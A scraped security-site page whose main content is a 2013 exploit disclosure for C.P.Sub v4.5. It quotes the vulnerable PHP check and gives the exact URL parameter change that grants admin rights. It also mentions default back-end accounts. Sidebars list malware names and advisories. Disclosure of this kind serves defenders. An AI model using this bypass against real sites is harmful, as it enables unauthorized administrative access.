|
Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
07/01/2013
C.P.Sub 4.5 - Authentication Bypass#!/usr/bin/python# # #################################################################### # # Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication # Date: 2013/6/27 # Exploit Author: Chako # Vendor Homepage: http://www.cooltey.org/ping/php.php # Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip # Version: <= v4.5 # Tested on: Windows 7 # # #################################################################### Improper Authentication: ========================================== Description: C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege. Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege. /check.php (LINE: 36-44) -------------------------------------------------------------- if($_GET[user_com] != "") { $user_com = $_GET[user_com]; }elseif($_POST[user_com] != "") { $user_com = $_POST[user_com]; } if($user_com == "biggest") { -------------------------------------------------------------- Exploit: -------------------------------------------------------------- change http://Example_Target/info.php?cookie=yes&;user_com=second to http://Example_Target/info.php?cookie=yes&;user_com=biggest Misconfiguration ========================================== There are some default accounts for C.P.Sub <= v4.5 that allows an attacker to access back-end management page. It could lead to further attack. |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |
The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
